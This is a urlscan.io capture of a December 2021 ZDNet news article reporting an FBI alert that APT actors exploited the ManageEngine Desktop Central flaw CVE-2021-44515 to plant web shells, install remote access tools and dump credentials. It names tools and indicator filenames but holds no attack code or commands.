urlscan.io logo urlscan.io
SecurityTrails logo

www.zdnet.com Open in urlscan Pro
2a04:4e42:4d::666  Public Scan

Back to summary
Submitted URL: https://t.co/UKBSLiMkKM
Effective URL: https://www.zdnet.com/article/fbi-hackers-are-actively-exploiting-this-flaw-on-manageengine-desktop-central-servers/
Submission: On December 21 via api from US — Scanned from DE

Form analysis 1 forms found in the DOM

GET https://www.zdnet.com/search/

<form class="header-search" method="get" action="https://www.zdnet.com/search/">
  <label for="header-search-field" class="hidden">What are you looking for?</label>
  <input type="search" id="header-search-field" title="query" autocomplete="off" placeholder="What are you looking for?" tabindex="1" name="q" value="" class="smart-search-input">
  <button type="submit" class="search-button" data-omniture-track="moduleClick" data-omniture-track-data="{&quot;moduleInfo&quot;: &quot;Header-Search&quot;, &quot;pageType&quot;: &quot;article&quot;}"> Go </button>
</form>

Text Content

 * 
 * Central Europe
 * Middle East
 * Scandinavia
 * Africa
 * UK
 * Italy
 * Spain
 * Newsletters
 * Blogs
 * Menu More
    * Central Europe
    * Middle East
    * Scandinavia
    * Africa
    * UK
    * Italy
    * Spain
    * Estonia
    * European Union
    * Mobility
    * Hardware
    * Innovation
    * See All Topics
    * Newsletters
    * Blogs
    * Downloads
    * Reviews
    * Galleries
    * Videos

 * Edition: EU
    * Asia
    * Australia
    * Europe
    * India
    * United Kingdom
    * United States
    * ZDNet France
    * ZDNet Germany
    * ZDNet Korea
    * ZDNet Japan

 * 
 * What are you looking for? Go
   
 * Join / Log In
 * Account
    * Preferences
    * Community
    * Newsletters
    * Log Out

must read: How to lure employees back to the office? You can't. Not now. Not
ever.


FBI: HACKERS ARE ACTIVELY EXPLOITING THIS FLAW ON MANAGEENGINE DESKTOP CENTRAL
SERVERS

Zoho released a patch in December, but attackers are still trying to use the
flaw.

 * 
 * 
 * 
 * 
 * 
 * 
 * 


Written by Liam Tung, Contributor

Liam Tung Contributor

Liam Tung is an Australian business technology journalist living a few too many
Swedish miles north of Stockholm for his liking. He gained a bachelors degree in
economics and arts (cultural studies) at Sydney's Macquarie University, but
hacked (without Norse or malicious code for that matter) his way into a career
as an enterprise tech, security and telecommunications journalist with ZDNet
Australia.

Full Bio
on December 21, 2021 | Topic: Security

The FBI's cyber division has issued an alert warning enterprises using
Zoho-owned ManageEngine's Desktop Central that advanced attackers have been
exploiting a flaw to install malware since late October.

Zoho released a patch for an authentication bypass flaw CVE-2021-44515 on
December 3, warning at the time that it had seen "indications of exploitation"
and urged customers to update immediately.    

Zoho didn't provide further details of the attacks at the time, which occurred
after activity this year targeting previously patched flaws in ManageEngine
products that are tracked as CVE-2021-40539 and CVE-2021-44077. However, the FBI
says in the new alert that advanced persistent threat (APT) actors have been
exploiting CVE-2021-44515 since at least October 2021. 

"Since at least late October 2021, APT actors have been actively exploiting a
zero-day, now identified as CVE-2021-44515, on ManageEngine Desktop Central
servers," the FBI alert said.

Microsoft has previously attributed some of the earlier activity to a Chinese
hacker group that was installing web shells on compromised servers to gain
persistence on compromised servers. The flaws affected IT management products
used by end-user organizations and managed service providers.  

The FBI now says it observed APT actors compromising Desktop Central servers
using the flaw, now known as CVE-2021-44515 to drop a webshell that overrides a
legitimate function of Desktop Central. 

The attackers then downloaded post-exploitation tools, enumerated domain users
and groups, conducted network reconnaissance, attempted lateral movement across
the network and dumped credentials.



ManageEngine is the enterprise IT management software division of Zoho, a
company well known for its software-as-a-service products.

The flaw affects Desktop Central software for both enterprise customers and the
version for managed service provider (MSP) customers.

The FBI has filled in some details about how attackers are abusing the flaw
after obtaining samples that were downloaded from likely compromised
ManageEngine ADSelfService Plus servers.

It has seen attackers upload two variants of web shells with the filenames
emsaler.zip (variant 1, late October 2021), eco-inflect.jar (variant 1, mid
November 2021) and aaa.zip (variant 2, late November 2021). The webshell
overrides the legitimate Desktop Central application protocol interface servlet
endpoint. 

The webshell is also used for reconnaissance and domain enumeration. Eventually,
the attackers install a remote access tool (RAT) for further intrusion, lateral
movement, and credential dumping using the penetration testing tool Mimikatz,
and LSASS process memory dumping. 

The attackers also used the Windows authentication protocol WDigest to steal
credentials through an LSASS dump, signaling the attackers were using so-called
'living off the land' legitimate tools for nefarious purposes. 

Others tools in this category include Microsoft's BITSAdmin command-line tool
"to download a likely ShadowPad variant dropper with filename mscoree.dll, and a
legitimate Microsoft AppLaunch binary, iop.exe", according to the FBI.   

ManageEngine has strongly advised customers to update their installations to the
latest build as soon as possible.


Security TV | Data Management | CXO | Data Centers
Show Comments
LOG IN TO COMMENT
 * My Profile
 * Log Out

| Community Guidelines


JOIN DISCUSSION


Add Your Comment
Add Your Comment


RELATED

 * 
 * 
 * 
 * 
 * 

 * Log4j flaw: Now state-backed hackers are using bug as part of attacks, warns
   Microsoft
   
   

 * Log4j flaw: Attackers are making thousands of attempts to exploit this severe
   vulnerability
   
   

 * Suspected Iranian hackers target airline with new backdoor
   
   

 * How to get cloud storage costs under control
   
   

 * After ransomware attack, global logistics firm Hellmann warns of scam calls
   and mail
   
   

 * CISA, White House urge organizations to get ready for holiday cyberattacks
   
   

 * Ransomware suspect arrested over attacks on 'high-profile' organisations
   
   

 * Best last-minute gifts for hackers: Cybersecurity presents, secured
   
   

 * Victims awarded $18 million in GirlsDoPorn online video case, boss on the run
   
   



ZDNet
Connect with us


© 2021 ZDNET, A RED VENTURES COMPANY. ALL RIGHTS RESERVED. Privacy Policy |
Cookie Settings | Advertise | Terms of Use

 * Topics
 * Galleries
 * Videos
 * Sponsored Narratives
 * Do Not Sell My Information

 * About ZDNet
 * Meet The Team
 * All Authors
 * RSS Feeds
 * Site Map
 * Reprint Policy

 * Manage | Log Out
 * Join | Log In
 * Membership
 * Newsletters
 * Site Assistance
 * ZDNet Academy

Cookie Settings

We use cookies and similar technologies to understand how you use our services,
improve your experience and serve you personalized content and advertising. By
clicking "Accept All", you accept all cookies. By clicking "Reject All", you
reject all cookies except Strictly Necessary cookies. To manage your cookies and
learn more about our use of cookies click “Cookie Settings”.Learn more.

Cookie Settings Reject All Accept All